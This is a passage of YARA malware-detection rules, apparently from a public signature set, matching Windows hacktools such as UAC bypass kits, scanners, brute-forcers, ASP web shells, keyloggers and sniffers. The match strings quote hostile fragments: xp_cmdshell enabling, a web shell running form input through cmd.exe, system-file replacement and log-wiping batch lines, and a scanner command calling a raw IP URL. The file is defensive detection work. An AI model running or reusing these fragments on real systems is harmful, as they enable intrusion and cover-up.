alert enough to be using Nmap? Have some coffee or Jolt(tm)." ascii condition: all of them } rule iKAT_startbar { meta: description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe" author = "Florian Roth" date = "05.11.14" score = 50 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "0cac59b80b5427a8780168e1b85c540efffaf74f" strings: $s2 = "Shinysoft Limited1" fullword ascii $s3 = "Shinysoft Limited0" fullword ascii $s4 = "Wellington1" fullword ascii $s6 = "Wainuiomata1" fullword ascii $s8 = "56 Wright St1" fullword ascii $s9 = "UTN-USERFirst-Object" fullword ascii $s10 = "New Zealand1" fullword ascii condition: all of them } rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc { meta: description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe" author = "Florian Roth" date = "05.11.14" reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" super_rule = 1 hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f" hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014" hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9" hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349" score = 20 strings: $s0 = "Failed to get temp file for source AES decryption" fullword $s5 = "Failed to get encryption header for pwd-protect" fullword $s17 = "Failed to get filetime" fullword $s20 = "Failed to delete temp file for password decoding (3)" fullword condition: all of them } rule iKAT_Tool_Generic { meta: description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe" author = "Florian Roth" date = "05.11.14" score = 55 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" super_rule = 1 hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f" hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9" hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349" strings: $s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword $s1 = "Failed to read the entire file" fullword $s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword $s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P" $s9 = "Running Zip pipeline..." fullword $s10 = "<FinTitle />" fullword $s12 = "<AutoTemp>0</AutoTemp>" fullword $s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword $s15 = "AES Encrypting..." fullword $s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword condition: all of them } rule BypassUac2 { meta: description = "Auto-generated rule - file BypassUac2.zip" author = "yarGen Yara Rule Generator" hash = "ef3e7dd2d1384ecec1a37254303959a43695df61" strings: $s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii $s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii $s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii condition: all of them } rule BypassUac_3 { meta: description = "Auto-generated rule - file BypassUacDll.dll" author = "yarGen Yara Rule Generator" hash = "1974aacd0ed987119999735cad8413031115ce35" strings: $s0 = "BypassUacDLL.dll" fullword wide $s1 = "\\Release\\BypassUacDll" ascii $s3 = "Win7ElevateDLL" fullword wide $s7 = "BypassUacDLL" fullword wide condition: 3 of them } rule BypassUac_9 { meta: description = "Auto-generated rule - file BypassUac.zip" author = "yarGen Yara Rule Generator" hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d" strings: $s0 = "/x86/BypassUac.exe" fullword ascii $s1 = "/x64/BypassUac.exe" fullword ascii $s2 = "/x86/BypassUacDll.dll" fullword ascii $s3 = "/x64/BypassUacDll.dll" fullword ascii $s15 = "BypassUac" fullword ascii condition: all of them } rule BypassUacDll_6 { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s3 = "BypassUacDLL.dll" fullword wide $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii condition: all of them } rule BypassUacDll_7 { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s3 = "BypassUacDLL.dll" fullword wide $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii condition: all of them } rule BypassUac_EXE { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s1 = "Wole32.dll" wide $s3 = "System32\\migwiz" wide $s4 = "System32\\migwiz\\CRYPTBASE.dll" wide $s5 = "Elevation:Administrator!new:" wide $s6 = "BypassUac" wide condition: all of them } rule APT_Proxy_Malware_Packed_dev { meta: author = "FRoth" date = "2014-11-10" description = "APT Malware - Proxy" hash = "6b6a86ceeab64a6cb273debfa82aec58" score = 50 strings: $string0 = "PECompact2" fullword $string1 = "[LordPE]" $string2 = "steam_ker.dll" condition: all of them } rule Tzddos_DDoS_Tool_CN { meta: description = "Disclosed hacktool set - file tzddos" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d4c517eda5458247edae59309453e0ae7d812f8e" strings: $s0 = "for /f %%a in (host.txt) do (" fullword ascii $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii $s2 = "del host.txt /q" fullword ascii $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii $s4 = "start Http.exe %%a %http%" fullword ascii $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii $s6 = "del Result.txt s2.txt s1.txt " fullword ascii condition: all of them } rule Ncat_Hacktools_CN { meta: description = "Disclosed hacktool set - file nc.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "001c0c01c96fa56216159f83f6f298755366e528" strings: $s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii $s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii $s3 = "gethostpoop fuxored" fullword ascii $s6 = "VERNOTSUPPORTED" fullword ascii $s7 = "%s [%s] %d (%s)" fullword ascii $s12 = " `--%s' doesn't allow an argument" fullword ascii condition: all of them } rule MS08_067_Exploit_Hacktools_CN { meta: description = "Disclosed hacktool set - file cs.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "a3e9e0655447494253a1a60dbc763d9661181322" strings: $s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii $s3 = "Make SMB Connection error:%d" fullword ascii $s5 = "Send Payload Over!" fullword ascii $s7 = "Maybe Patched!" fullword ascii $s8 = "RpcExceptionCode() = %u" fullword ascii $s11 = "ph4nt0m" fullword wide $s12 = "\\\\%s\\IPC" ascii condition: 4 of them } rule Hacktools_CN_Burst_sql { meta: description = "Disclosed hacktool set - file sql.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d5139b865e99b7a276af7ae11b14096adb928245" strings: $s0 = "s.exe %s %s %s %s %d /save" fullword ascii $s2 = "s.exe start error...%d" fullword ascii $s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii $s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii $s10 = "Result.txt" fullword ascii $s11 = "Usage:sql.exe [options]" fullword ascii $s17 = "%s root %s %d error" fullword ascii $s18 = "Pass.txt" fullword ascii $s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii condition: 6 of them } rule Hacktools_CN_Panda_445TOOL { meta: description = "Disclosed hacktool set - file 445TOOL.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = "92050ba43029f914696289598cf3b18e34457a11" strings: $s0 = "scan.bat" fullword ascii $s1 = "Http.exe" fullword ascii $s2 = "GOGOGO.bat" fullword ascii $s3 = "ip.txt" fullword ascii condition: all of them } rule Hacktools_CN_Panda_445 { meta: description = "Disclosed hacktool set - file 445.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = "a61316578bcbde66f39d88e7fc113c134b5b966b" strings: $s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii $s1 = "445\\nc.exe" fullword ascii $s2 = "445\\s.exe" fullword ascii $s3 = "cs.exe %1" fullword ascii $s4 = "445\\cs.exe" fullword ascii $s5 = "445\\ip.txt" fullword ascii $s6 = "445\\cmd.bat" fullword ascii $s9 = "@echo off" fullword ascii condition: all of them } rule Hacktools_CN_WinEggDrop { meta: description = "Disclosed hacktool set - file s.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "7665011742ce01f57e8dc0a85d35ec556035145d" strings: $s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii $s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii $s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii $s8 = "Something Wrong About The Ports" fullword ascii $s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii $s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii $s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii $s13 = "%-16s %-5d -> \"%s\"" fullword ascii $s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii $s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii $s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii condition: 5 of them } rule Hacktools_CN_Scan_BAT { meta: description = "Disclosed hacktool set - file scan.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a" strings: $s0 = "for /f %%a in (host.txt) do (" fullword ascii $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii $s2 = "del host.txt /q" fullword ascii $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii $s4 = "start Http.exe %%a %http%" fullword ascii $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_Burst { meta: description = "Disclosed hacktool set - file Burst.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776" strings: $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii condition: all of them } rule Hacktools_CN_445_cmd { meta: description = "Disclosed hacktool set - file cmd.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "69b105a3aec3234819868c1a913772c40c6b727a" strings: $bat = "@echo off" fullword ascii $s0 = "cs.exe %1" fullword ascii $s2 = "nc %1 4444" fullword ascii condition: $bat at 0 and all of ($s*) } rule Hacktools_CN_GOGOGO_Bat { meta: description = "Disclosed hacktool set - file GOGOGO.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd" strings: $s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii $s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii $s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii $s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii $s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii $s6 = "del /f tcpip.sys" fullword ascii $s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii $s10 = "call scan.bat" fullword ascii $s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii $s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii $s18 = "sc config LmHosts start= auto" fullword ascii $s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii $s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii condition: 3 of them } rule Hacktools_CN_Burst_pass { meta: description = "Disclosed hacktool set - file pass.txt" author = "Florian Roth" date = "17.11.14" score = 60 hash = "55a05cf93dbd274355d798534be471dff26803f9" strings: $s0 = "123456.com" fullword ascii $s1 = "123123.com" fullword ascii $s2 = "360.com" fullword ascii $s3 = "123.com" fullword ascii $s4 = "juso.com" fullword ascii $s5 = "sina.com" fullword ascii $s7 = "changeme" fullword ascii $s8 = "master" fullword ascii $s9 = "google.com" fullword ascii $s10 = "chinanet" fullword ascii $s12 = "lionking" fullword ascii condition: all of them } rule Hacktools_CN_JoHor_Posts_Killer { meta: description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a" strings: $s0 = "Multithreading Posts_Send Killer" fullword ascii $s3 = "GET [Access Point] HTTP/1.1" fullword ascii $s6 = "The program's need files was not exist!" fullword ascii $s7 = "JoHor_Posts_Killer" fullword wide $s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii $s10 = " ( /s ) :" fullword ascii $s11 = "forms.vbp" fullword ascii $s12 = "forms.vcp" fullword ascii $s13 = "Software\\FlySky\\E\\Install" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_tesksd { meta: description = "Disclosed hacktool set - file tesksd.jpg" author = "Florian Roth" date = "17.11.14" score = 60 hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb" strings: $s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii $s1 = "ExeMiniDownload.exe" fullword wide $s16 = "POST %Hs" fullword ascii condition: all of them } rule Hacktools_CN_Http { meta: description = "Disclosed hacktool set - file Http.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338" strings: $s0 = "RPCRT4.DLL" fullword ascii $s1 = "WNetAddConnection2A" fullword ascii $s2 = "NdrPointerBufferSize" fullword ascii $s3 = "_controlfp" fullword ascii condition: all of them and filesize < 10KB } rule Hacktools_CN_Burst_Start { meta: description = "Disclosed hacktool set - file Start.bat - DoS tool" author = "Florian Roth" date = "17.11.14" score = 60 hash = "75d194d53ccc37a68286d246f2a84af6b070e30c" strings: $s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii $s1 = "Blast.bat /r 600" fullword ascii $s2 = "Blast.bat /l Blast.bat" fullword ascii $s3 = "Blast.bat /c 600" fullword ascii $s4 = "start Clear.bat" fullword ascii $s5 = "del Result.txt" fullword ascii $s6 = "s syn %%i %%j 3306 /save" fullword ascii $s7 = "start Thecard.bat" fullword ascii $s10 = "setlocal enabledelayedexpansion" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_tasksvr { meta: description = "Disclosed hacktool set - file tasksvr.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0" strings: $s2 = "Consys21.dll" fullword ascii $s4 = "360EntCall.exe" fullword wide $s15 = "Beijing1" fullword ascii condition: all of them } rule Hacktools_CN_Burst_Clear { meta: description = "Disclosed hacktool set - file Clear.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4" strings: $s0 = "del /f /s /q %systemdrive%\\*.log " fullword ascii $s1 = "del /f /s /q %windir%\\*.bak " fullword ascii $s4 = "del /f /s /q %systemdrive%\\*.chk " fullword ascii $s5 = "del /f /s /q %systemdrive%\\*.tmp " fullword ascii $s8 = "del /f /q %userprofile%\\COOKIES s\\*.* " fullword ascii $s9 = "rd /s /q %windir%\\temp & md %windir%\\temp " fullword ascii $s11 = "del /f /s /q %systemdrive%\\recycled\\*.* " fullword ascii $s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\" " fullword ascii $s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" " ascii condition: 5 of them } rule Hacktools_CN_Burst_Thecard { meta: description = "Disclosed hacktool set - file Thecard.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c" strings: $s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii $s1 = "Http://www.coffeewl.com" fullword ascii $s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii $s3 = "for /L %%a in (" fullword ascii $s4 = "MODE con: COLS=42 lines=5" fullword ascii condition: all of them } rule Hacktools_CN_Burst_Blast { meta: description = "Disclosed hacktool set - file Blast.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "b07702a381fa2eaee40b96ae2443918209674051" strings: $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii $s1 = "@echo off" fullword ascii condition: all of them } rule VUBrute_VUBrute { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe" author = "Florian Roth" date = "22.11.14" score = 70 hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7" strings: $s0 = "Text Files (*.txt);;All Files (*)" fullword ascii $s1 = "http://ubrute.com" fullword ascii $s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii $s14 = "error.txt" fullword ascii condition: all of them } rule DK_Brute { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe" author = "Florian Roth" date = "22.11.14" score = 70 reference = "http://goo.gl/xiIphp" hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d" strings: $s6 = "get_CrackedCredentials" fullword ascii $s13 = "Same port used for two different protocols:" fullword wide $s18 = "coded by fLaSh" fullword ascii $s19 = "get_grbToolsScaningCracking" fullword ascii condition: all of them } rule VUBrute_config { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini" author = "Florian Roth" date = "22.11.14" score = 70 reference = "http://goo.gl/xiIphp" hash = "b9f66b9265d2370dab887604921167c11f7d93e9" strings: $s2 = "Restore=1" fullword ascii $s6 = "Thread=" ascii $s7 = "Running=1" fullword ascii $s8 = "CheckCombination=" fullword ascii $s10 = "AutoSave=1.000000" fullword ascii $s12 = "TryConnect=" ascii $s13 = "Tray=" ascii condition: all of them } rule sig_238_hunt { meta: description = "Disclosed hacktool set (old stuff) - file hunt.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "f9f059380d95c7f8d26152b1cb361d93492077ca" strings: $s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii $s3 = "Usage - hunt \\\\servername" fullword ascii $s4 = ".share = %S - %S" fullword wide $s5 = "SMB share enumerator and admin finder " fullword ascii $s7 = "Hunt only runs on Windows NT..." fullword ascii $s8 = "User = %S" fullword ascii $s9 = "Admin is %s\\%s" fullword ascii condition: all of them } rule sig_238_listip { meta: description = "Disclosed hacktool set (old stuff) - file listip.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b" strings: $s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii $s2 = "ERROR No.2!!! Program Terminate." fullword ascii $s4 = "Local Host Name: %s" fullword ascii $s5 = "Packed by exe32pack 1.38" fullword ascii $s7 = "Local Computer Name: %s" fullword ascii $s8 = "Local IP Adress: %s" fullword ascii condition: all of them } rule ArtTrayHookDll { meta: description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c" strings: $s0 = "ArtTrayHookDll.dll" fullword ascii $s7 = "?TerminateHook@@YAXXZ" fullword ascii condition: all of them } rule sig_238_eee { meta: description = "Disclosed hacktool set (old stuff) - file eee.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "236916ce2980c359ff1d5001af6dacb99227d9cb" strings: $s0 = "szj1230@yesky.com" fullword wide $s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii $s4 = "MailTo:szj1230@yesky.com" fullword wide $s5 = "Command1_Click" fullword ascii $s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide $s11 = "vb5chs.dll" fullword ascii $s12 = "MSVBVM50.DLL" fullword ascii condition: all of them } rule aspbackdoor_asp4 { meta: description = "Disclosed hacktool set (old stuff) - file asp4.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "faf991664fd82a8755feb65334e5130f791baa8c" strings: $s0 = "system.dll" fullword ascii $s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii $s3 = "Public Function reboot(atype As Variant)" fullword ascii $s4 = "t& = ExitWindowsEx(1, atype)" ascii $s5 = "atype=request(\"atype\") " fullword ascii $s7 = "AceiveX dll" fullword ascii $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii $s10 = "sys.reboot(atype)" fullword ascii condition: all of them } rule aspfile1 { meta: description = "Disclosed hacktool set (old stuff) - file aspfile1.asp" author = "Florian Roth" date = "23.11.14" score = 60 hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af" strings: $s0 = "' -- check for a command that we have posted -- '" fullword ascii $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii $s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii $s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii $s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii $s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii condition: 3 of them } rule EditServer_HackTool { meta: description = "Disclosed hacktool set (old stuff) - file EditServer.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3" strings: $s0 = "%s Server.exe" fullword ascii $s1 = "Service Port: %s" fullword ascii $s2 = "The Port Must Been >0 & <65535" fullword ascii $s8 = "3--Set Server Port" fullword ascii $s9 = "The Server Password Exceeds 32 Characters" fullword ascii $s13 = "Service Name: %s" fullword ascii $s14 = "Server Password: %s" fullword ascii $s17 = "Inject Process Name: %s" fullword ascii $x1 = "WinEggDrop Shell Congirator" fullword ascii condition: 5 of ($s*) or $x1 } rule sig_238_letmein { meta: description = "Disclosed hacktool set (old stuff) - file letmein.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "74d223a56f97b223a640e4139bb9b94d8faa895d" strings: $s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii $s6 = "Error get users from server!" fullword ascii $s7 = "get in nt by name and null" fullword ascii $s16 = "get something from nt, hold by killusa." fullword ascii condition: all of them } rule sig_238_token { meta: description = "Disclosed hacktool set (old stuff) - file token.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14" strings: $s0 = "Logon.exe" fullword ascii $s1 = "Domain And User:" fullword ascii $s2 = "PID=Get Addr$(): One" fullword ascii $s3 = "Process " fullword ascii $s4 = "psapi.dllK" fullword ascii condition: all of them } rule sig_238_TELNET { meta: description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME" author = "Florian Roth" date = "23.11.14" score = 60 hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1" strings: $s0 = "TELNET [host [port]]" fullword wide $s2 = "TELNET.EXE" fullword wide $s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide $s14 = "Software\\Microsoft\\Telnet" fullword wide condition: all of them } rule snifferport { meta: description = "Disclosed hacktool set (old stuff) - file snifferport.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d14133b5eaced9b7039048d0767c544419473144" strings: $s0 = "iphlpapi.DLL" fullword ascii $s5 = "ystem\\CurrentCorolSet\\" fullword ascii $s11 = "Port.TX" fullword ascii $s12 = "32Next" fullword ascii $s13 = "V1.2 B" fullword ascii condition: all of them } rule sig_238_webget { meta: description = "Disclosed hacktool set (old stuff) - file webget.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "36b5a5dee093aa846f906bbecf872a4e66989e42" strings: $s0 = "Packed by exe32pack" ascii $s1 = "GET A HTTP/1.0" fullword ascii $s2 = " error " fullword ascii $s13 = "Downloa" ascii condition: all of them } rule XYZCmd_zip_Folder_XYZCmd { meta: description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115" strings: $s0 = "Executes Command Remotely" fullword wide $s2 = "XYZCmd.exe" fullword wide $s6 = "No Client Software" fullword wide $s19 = "XYZCmd V1.0 For NT S" fullword ascii condition: all of them } rule ASPack_Chinese { meta: description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini" author = "Florian Roth" date = "23.11.14" score = 60 hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e" strings: $s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii $s1 = "; For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii $s2 = "E-Mail: shinlan@km169.net" fullword ascii $s8 = "; Please, translate text only after simbol '='" fullword ascii $s19 = "= Compress with ASPack" fullword ascii condition: all of them } rule aspbackdoor_EDIR { meta: description = "Disclosed hacktool set (old stuff) - file EDIR.ASP" author = "Florian Roth" date = "23.11.14" score = 60 hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb" strings: $s1 = "response.write \"<a href='index.asp'>" fullword ascii $s3 = "if Request.Cookies(\"password\")=\"" ascii $s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii $s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii $s19 = "whichdir=Request(\"path\")" fullword ascii condition: all of them } rule sig_238_filespy { meta: description = "Disclosed hacktool set (old stuff) - file filespy.exe" author = "Florian Roth" date = "23.11.14" score = 50 hash = "89d8490039778f8c5f07aa7fd476170293d24d26" strings: $s0 = "Hit [Enter] to begin command mode..." fullword ascii $s1 = "If you are in command mode," fullword ascii $s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii $s9 = "FileSpy.exe" fullword wide $s12 = "ERROR starting FileSpy..." fullword ascii $s16 = "exe\\filespy.dbg" fullword ascii $s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii $s19 = "Should be logging to screen..." fullword ascii $s20 = "Filmon: Unknown log record type" fullword ascii condition: 7 of them } rule ByPassFireWall_zip_Folder_Ie { meta: description = "Disclosed hacktool set (old stuff) - file Ie.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d1b9058f16399e182c9b78314ad18b975d882131" strings: $s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii $s1 = "LOADER ERROR" fullword ascii $s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii $s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii condition: all of them } rule EditKeyLogReadMe { meta: description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a" strings: $s0 = "editKeyLog.exe KeyLog.exe," fullword ascii $s1 = "WinEggDrop.DLL" fullword ascii $s2 = "nc.exe" fullword ascii $s3 = "KeyLog.exe" fullword ascii $s4 = "EditKeyLog.exe" fullword ascii $s5 = "wineggdrop" fullword ascii condition: 3 of them } rule PassSniffer_zip_Folder_readme { meta: description = "Disclosed hacktool set (old stuff) - file readme.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd" strings: $s0 = "PassSniffer.exe" fullword ascii $s1 = "POP3/FTP Sniffer" fullword ascii $s2 = "Password Sniffer V1.0" fullword ascii condition: 1 of them } rule sig_238_gina { meta: description = "Disclosed hacktool set (old stuff) - file gina.reg" author = "Florian Roth" date = "23.11.14" score = 60 hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6" strings: $s0 = "\"gina\"=\"gina.dll\"" fullword ascii $s1 = "REGEDIT4" fullword ascii $s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii condition: all of them } rule splitjoin { meta: description = "Disclosed hacktool set (old stuff) - file splitjoin.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c" strings: $s0 = "Not for distribution without the authors permission" fullword wide $s2 = "Utility to split and rejoin files.0" fullword wide $s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide $s19 = "SplitJoin" fullword wide condition: all of them } rule EditKeyLog { meta: description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a450c31f13c23426b24624f53873e4fc3777dc6b" strings: $s1 = "Press Any Ke" fullword ascii $s2 = "Enter 1 O" fullword ascii $s3 = "Bon >0 & <65535L" fullword ascii $s4 = "--Choose " fullword ascii condition: all of them } rule PassSniffer { meta: description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f" strings: $s2 = "Sniff" fullword ascii $s3 = "GetLas" fullword ascii $s4 = "VersionExA" fullword ascii $s10 = " Only RuntUZ" fullword ascii $s12 = "emcpysetprintf\\" fullword ascii $s13 = "WSFtartup" fullword ascii condition: all of them } rule aspfile2 { meta: description = 